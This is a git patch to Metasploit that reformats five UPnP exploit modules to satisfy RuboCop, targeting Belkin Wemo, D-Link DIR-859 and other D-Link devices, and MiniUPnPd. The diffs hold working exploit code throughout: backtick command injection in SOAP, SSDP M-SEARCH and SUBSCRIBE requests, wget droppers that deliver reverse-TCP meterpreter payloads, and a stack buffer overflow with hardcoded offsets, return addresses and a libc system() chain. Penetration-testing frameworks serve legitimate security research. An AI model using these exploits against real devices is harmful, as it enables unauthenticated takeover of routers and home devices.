From d567248b162ee308f3c5c5bb1265ca56d44ebfe2 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 18 May 2025 16:29:41 +1000 Subject: [PATCH] modules/exploits/linux/upnp: Resolve RuboCop violations --- .../linux/upnp/belkin_wemo_upnp_exec.rb | 135 ++++++++------- .../linux/upnp/dlink_dir859_exec_ssdpcgi.rb | 73 ++++---- .../linux/upnp/dlink_dir859_subscribe_exec.rb | 93 +++++----- .../linux/upnp/dlink_upnp_msearch_exec.rb | 2 +- .../exploits/linux/upnp/miniupnpd_soap_bof.rb | 162 +++++++++--------- 5 files changed, 243 insertions(+), 222 deletions(-) diff --git a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb index c5605690f3..71de25f8e3 100644 --- a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb +++ b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb @@ -12,60 +12,69 @@ class MetasploitModule < Msf::Exploit::Remote prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) - super(update_info(info, - 'Name' => 'Belkin Wemo UPnP Remote Code Execution', - 'Description' => %q{ - This module exploits a command injection in the Belkin Wemo UPnP API via - the SmartDevURL argument to the SetSmartDevInfo action. + super( + update_info( + info, + 'Name' => 'Belkin Wemo UPnP Remote Code Execution', + 'Description' => %q{ + This module exploits a command injection in the Belkin Wemo UPnP API via + the SmartDevURL argument to the SetSmartDevInfo action. - This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo - devices are known to be affected, albeit on a different RPORT (49153). - }, - 'Author' => [ - 'phikshun', # Discovery, UFuzz, and modules - 'wvu', # Crock-Pot testing and module - 'nstarke' # Version-checking research and implementation - ], - 'References' => [ - ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'], - ['URL', 'https://github.com/phikshun/ufuzz'], - ['URL', 'https://gist.github.com/phikshun/10900566'], - ['URL', 'https://gist.github.com/phikshun/9984624'], - ['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'], - ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'], - ['URL', 'http://www.wemo.com/'] - ], - 'DisclosureDate' => '2014-04-04', - 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_MIPSLE], - 'Privileged' => true, - 'Targets' => [ - ['Unix In-Memory', - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Type' => :unix_memory, - 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/unix/generic' - } + This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo + devices are known to be affected, albeit on a different RPORT (49153). + }, + 'Author' => [ + 'phikshun', # Discovery, UFuzz, and modules + 'wvu', # Crock-Pot testing and module + 'nstarke' # Version-checking research and implementation ], - ['Linux Dropper', - 'Platform' => 'linux', - 'Arch' => ARCH_MIPSLE, - 'Type' => :linux_dropper, - 'DefaultOptions' => { - 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' - } - ] - ], - 'DefaultTarget' => 1, - 'Notes' => { - 'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'], - 'Stability' => [CRASH_SAFE], - 'SideEffects' => [ARTIFACTS_ON_DISK], - 'Reliability' => [REPEATABLE_SESSION] - } - )) + 'References' => [ + ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'], + ['URL', 'https://github.com/phikshun/ufuzz'], + ['URL', 'https://gist.github.com/phikshun/10900566'], + ['URL', 'https://gist.github.com/phikshun/9984624'], + ['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'], + ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'], + ['URL', 'http://www.wemo.com/'] + ], + 'DisclosureDate' => '2014-04-04', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_MIPSLE], + 'Privileged' => true, + 'Targets' => [ + [ + 'Unix In-Memory', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/generic' + } + } + ], + [ + 'Linux Dropper', + { + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'Type' => :linux_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' + } + } + ] + ], + 'DefaultTarget' => 1, + 'Notes' => { + 'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'], + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [ARTIFACTS_ON_DISK], + 'Reliability' => [REPEATABLE_SESSION] + } + ) + ) register_options([ Opt::RPORT(49152) @@ -81,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi( 'method' => 'GET', - 'uri' => '/setup.xml' + 'uri' => '/setup.xml' ) unless res && res.code == 200 && res.body.include?('urn:Belkin:device:') @@ -93,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote checkcode = CheckCode::Detected version = (v = res.get_xml_document.at('firmwareVersion')&.text) && - v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Rex::Version.new($1) + v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && ::Regexp.last_match(1) && Rex::Version.new(::Regexp.last_match(1)) unless version vprint_error('Could not determine firmware version') @@ -120,9 +129,9 @@ class MetasploitModule < Msf::Exploit::Remote execute_command(payload.encoded) when :linux_dropper cmdstager = generate_cmdstager( - flavor: :wget, - temp: datastore['WritableDir'], - file: File.basename(cmdstager_path), + flavor: :wget, + temp: datastore['WritableDir'], + file: File.basename(cmdstager_path), noconcat: true ) @@ -136,15 +145,15 @@ class MetasploitModule < Msf::Exploit::Remote end end - def execute_command(cmd, opts = {}) + def execute_command(cmd, _opts = {}) send_request_cgi( - 'method' => 'POST', - 'uri' => '/upnp/control/basicevent1', - 'ctype' => 'text/xml', - 'headers' => { + 'method' => 'POST', + 'uri' => '/upnp/control/basicevent1', + 'ctype' => 'text/xml', + 'headers' => { 'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"' }, - 'data' => generate_soap_xml(cmd) + 'data' => generate_soap_xml(cmd) ) end diff --git a/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb b/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb index e772d094a3..87dfe20c27 100644 --- a/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb +++ b/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb @@ -13,63 +13,68 @@ class MetasploitModule < Msf::Exploit::Remote deprecated(Date.new(2024, 12, 1), 'Use `exploit/linux/upnp/dlink_upnp_msearch_exec` instead') def initialize(info = {}) - super(update_info(info, - 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi', - 'Description' => %q{ - D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi. - }, - 'Author' => - [ + super( + update_info( + info, + 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi', + 'Description' => %q{ + D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi. + }, + 'Author' => [ 's1kr10s', 'secenv' ], - 'License' => MSF_LICENSE, - 'References' => - [ + 'License' => MSF_LICENSE, + 'References' => [ ['CVE', '2019-20215'], ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73'] ], - 'DisclosureDate' => '2019-12-24', - 'Privileged' => true, - 'Platform' => 'linux', - 'Arch' => ARCH_MIPSBE, - 'DefaultOptions' => - { - 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', - 'CMDSTAGER::FLAVOR' => 'wget', - 'RPORT' => '1900' + 'DisclosureDate' => '2019-12-24', + 'Privileged' => true, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'wget', + 'RPORT' => '1900' }, - 'Targets' => - [ - [ 'Auto', { } ], + 'Targets' => [ + [ 'Auto', {} ], ], - 'CmdStagerFlavor' => %w{ echo wget }, - 'DefaultTarget' => 0 - )) + 'CmdStagerFlavor' => %w[echo wget], + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'Reliability' => [REPEATABLE_SESSION] + } + ) + ) - register_options( - [ - Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']]) - ]) + register_options( + [ + Msf::OptEnum.new('VECTOR', [true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']]) + ] + ) end def exploit execute_cmdstager(linemax: 1500) end - def execute_command(cmd, opts) + def execute_command(cmd, _opts) type = datastore['VECTOR'] - if type == "URN" - print_status("Target Payload URN") + if type == 'URN' + print_status('Target Payload URN') val = "urn:device:1;`#{cmd}`" else - print_status("Target Payload UUID") + print_status('Target Payload UUID') val = "uuid:`#{cmd}`" end connect_udp header = "M-SEARCH * HTTP/1.1\r\n" - header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n" + header << "Host:239.255.255.250: #{datastore['RPORT']}\r\n" header << "ST:#{val}\r\n" header << "Man:\"ssdp:discover\"\r\n" header << "MX:2\r\n\r\n" diff --git a/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb b/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb index fdbd72af1f..82c7b49c25 100644 --- a/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb +++ b/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb @@ -10,62 +10,63 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::CmdStager def initialize(info = {}) - super(update_info(info, - 'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution', - 'Description' => %q{ - D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP - interface. The vulnerability exists in /gena.cgi (function genacgi_main() in - /htdocs/cgibin), which is accessible without credentials. - }, - 'Author' => - [ + super( + update_info( + info, + 'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution', + 'Description' => %q{ + D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP + interface. The vulnerability exists in /gena.cgi (function genacgi_main() in + /htdocs/cgibin), which is accessible without credentials. + }, + 'Author' => [ 'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit 'Pablo Pollanco P.' # Vulnerability discovery and metasploit module ], - 'License' => MSF_LICENSE, - 'References' => - [ + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2019-17621' ], [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ] ], - 'DisclosureDate' => '2019-12-24', - 'Privileged' => true, - 'Platform' => 'linux', - 'Arch' => ARCH_MIPSBE, - 'DefaultOptions' => - { - 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', - 'CMDSTAGER::FLAVOR' => 'wget', - 'RPORT' => '49152' + 'DisclosureDate' => '2019-12-24', + 'Privileged' => true, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'wget', + 'RPORT' => '49152' }, - 'Targets' => - [ - [ 'Automatic', { } ], + 'Targets' => [ + [ 'Automatic', {} ], ], - 'CmdStagerFlavor' => %w{ echo wget }, - 'DefaultTarget' => 0, - )) - + 'CmdStagerFlavor' => %w[echo wget], + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [ARTIFACTS_ON_DISK], + 'Reliability' => [REPEATABLE_SESSION] + } + ) + ) end - def execute_command(cmd, opts) - callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s + - ":" + Rex::Text.rand_text_hex(4).to_i(16).to_s + - "/" + Rex::Text.rand_text_alpha(3..12) - begin - send_request_raw({ - 'uri' => "/gena.cgi?service=`#{cmd}`", - 'method' => 'SUBSCRIBE', - 'headers' => - { - 'Callback' => "<#{callback_uri}>", - 'NT' => 'upnp:event', - 'Timeout' => 'Second-1800', - }, - }) - rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice") - end + def execute_command(cmd, _opts) + callback_uri = 'http://192.168.0.' + Rex::Text.rand_text_hex(2).to_i(16).to_s + + ':' + Rex::Text.rand_text_hex(4).to_i(16).to_s + + '/' + Rex::Text.rand_text_alpha(3..12) + send_request_raw({ + 'uri' => "/gena.cgi?service=`#{cmd}`", + 'method' => 'SUBSCRIBE', + 'headers' => + { + 'Callback' => "<#{callback_uri}>", + 'NT' => 'upnp:event', + 'Timeout' => 'Second-1800' + } + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice") end def exploit diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb index 68456d2078..a0514bed96 100644 --- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb +++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb @@ -337,7 +337,7 @@ class MetasploitModule < Msf::Exploit::Remote connect_udp header = "M-SEARCH * HTTP/1.1\r\n" - header << 'HOST:' + datastore['RHOST'].to_s + ':' + datastore['RPORT'].to_s + "\r\n" + header << "HOST:#{datastore['RHOST']}:#{datastore['RPORT']}\r\n" header << "ST:#{payload}\r\n" header << "MX:2\r\n" header << "MAN:\"ssdp:discover\"\r\n\r\n" diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb index fddf3877b8..dadd7a8f5a 100644 --- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb @@ -10,45 +10,44 @@ class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) - super(update_info(info, - 'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution', - 'Description' => %q{ + super( + update_info( + info, + 'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution', + 'Description' => %q{ This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability - present in the SOAPAction HTTP header handling. - }, - 'Author' => - [ + present in the SOAPAction HTTP header handling. + }, + 'Author' => [ 'hdm', # Vulnerability discovery 'Dejan Lukan', # Metasploit module, debian target - 'Onur ALANBEL', # Expliot for Airties target + 'Onur ALANBEL', # Exploit for Airties target 'Michael Messner ' # Metasploit module, Airties target ], - 'License' => MSF_LICENSE, - 'DefaultOptions' => { 'EXITFUNC' => 'process', }, - 'Platform' => 'linux', - 'Arch' => [ARCH_X86, ARCH_MIPSBE], - 'References' => - [ + 'License' => MSF_LICENSE, + 'DefaultOptions' => { 'EXITFUNC' => 'process' }, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_MIPSBE], + 'References' => [ [ 'CVE', '2013-0230' ], [ 'OSVDB', '89624' ], [ 'BID', '57608' ], [ 'URL', 'https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play'] ], - 'Payload' => - { + 'Payload' => { 'DisableNops' => true }, - 'Targets' => - [ - [ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0', + 'Targets' => [ + [ + 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0', { - 'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd + 'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd 'Offset' => 2123, - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the # input, which is why it can't be part of the shellcode (otherwise the vulnerable part # of the program is never reached) - 'Payload' => + 'Payload' => { 'Space' => 2060, 'BadChars' => "\x00\x22" @@ -56,22 +55,29 @@ class MetasploitModule < Msf::Exploit::Remote :callback => :target_debian } ], - [ 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0', + [ + 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0', { - 'Offset' => 2048, - 'LibcBase' => 0x2aabd000, - 'System' => 0x00031AC0, - 'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0 + 'Offset' => 2048, + 'LibcBase' => 0x2aabd000, + 'System' => 0x00031AC0, + 'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0 'Fingerprint' => 'AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0', - 'Arch' => ARCH_MIPSBE, - :callback => :target_airties + 'Arch' => ARCH_MIPSBE, + :callback => :target_airties } ] ], - 'DefaultTarget' => 0, - 'Privileged' => false, - 'DisclosureDate' => '2013-03-27', - )) + 'DefaultTarget' => 0, + 'Privileged' => false, + 'DisclosureDate' => '2013-03-27', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [ARTIFACTS_ON_DISK], + 'Reliability' => [] + } + ) + ) register_options([ Opt::RPORT(5555), @@ -83,8 +89,8 @@ class MetasploitModule < Msf::Exploit::Remote def check begin res = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/' + 'method' => 'POST', + 'uri' => '/' }) rescue ::Rex::ConnectionError return Exploit::CheckCode::Safe @@ -102,11 +108,11 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - unless self.respond_to?(target[:callback]) + unless respond_to?(target[:callback]) fail_with(Failure::BadConfig, 'Invalid target specified: no callback function defined') end - self.send(target[:callback]) + send(target[:callback]) end def target_debian @@ -114,10 +120,10 @@ class MetasploitModule < Msf::Exploit::Remote # Build the SOAP Exploit # # jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char) - sploit = "\xeb\x2d" + sploit = "\xeb\x2d" # a valid action - sploit += "n:schemas-upnp-org:service:WANIPConnection:1#" + sploit += 'n:schemas-upnp-org:service:WANIPConnection:1#' # payload sploit += payload.encoded @@ -126,10 +132,10 @@ class MetasploitModule < Msf::Exploit::Remote sploit += rand_text(target['Offset'] - sploit.length - 16) # overwrite registers on stack: the values are not used, so we can overwrite them with anything - sploit += rand_text(4) # overwrite EBX - sploit += rand_text(4) # overwrite ESI - sploit += rand_text(4) # overwrite EDI - sploit += rand_text(4) # overwrite EBP + sploit += rand_text(4) # overwrite EBX + sploit += rand_text(4) # overwrite ESI + sploit += rand_text(4) # overwrite EDI + sploit += rand_text(4) # overwrite EBP # Overwrite EIP with addresss of "pop ebp, ret", because the second value on the # stack points directly to the string after 'Soapaction: ', which is why we must @@ -139,20 +145,20 @@ class MetasploitModule < Msf::Exploit::Remote sploit += [target.ret].pack('V') # the ending " character is necessary for the vulnerability to be reached - sploit += "\"" + sploit += '"' # data sent in the POST body data = - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + + "\r\n" \ + "\r\n" \ + "\r\n" \ + "\r\n" \ + "\r\n" \ + "\r\n" \ "\r\n" # @@ -160,12 +166,12 @@ class MetasploitModule < Msf::Exploit::Remote # print_status("Sending exploit to victim #{target.name}...") send_request_cgi({ - 'method' => 'POST', - 'uri' => "/", + 'method' => 'POST', + 'uri' => '/', 'headers' => { - 'SOAPAction' => sploit, + 'SOAPAction' => sploit }, - 'data' => data, + 'data' => data }) # disconnect from the server @@ -175,48 +181,48 @@ class MetasploitModule < Msf::Exploit::Remote def target_airties print_status("Sending exploit to victim #{target.name}...") execute_cmdstager( - :flavor => :echo + flavor: :echo ) end - def execute_command(cmd, opts) + def execute_command(cmd, _opts) # Build the SOAP Exploit # a valid action - sploit = "n:schemas-upnp-org:service:WANIPConnection:1#" + sploit = 'n:schemas-upnp-org:service:WANIPConnection:1#' sploit << rand_text_alpha_upper(target['Offset']) - sploit << [target['LibcBase'] + target['System']].pack("N") # s0 - address of system + sploit << [target['LibcBase'] + target['System']].pack('N') # s0 - address of system sploit << rand_text_alpha_upper(24) # $s1 - $s6 - sploit << [target['LibcBase'] + target['CallSystem']].pack("N") + sploit << [target['LibcBase'] + target['CallSystem']].pack('N') # 0001CC94 addiu $a0, $sp, 0x18 # 0001CC98 move $t9, $s0 # 0001CC9C jalr $t9 # 0001CCA0 li $a1, 1 - sploit << rand_text_alpha_upper(24) #filler + sploit << rand_text_alpha_upper(24) # filler sploit << cmd # data sent in the POST body data = - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + - "\r\n" + + "\r\n" \ + "\r\n" \ + "\r\n" \ + "\r\n" \ + "\r\n" \ + "\r\n" \ "\r\n" send_request_cgi({ - 'method' => 'POST', - 'uri' => '/', + 'method' => 'POST', + 'uri' => '/', 'headers' => { - 'SOAPAction' => sploit, + 'SOAPAction' => sploit }, - 'data' => data + 'data' => data }) end end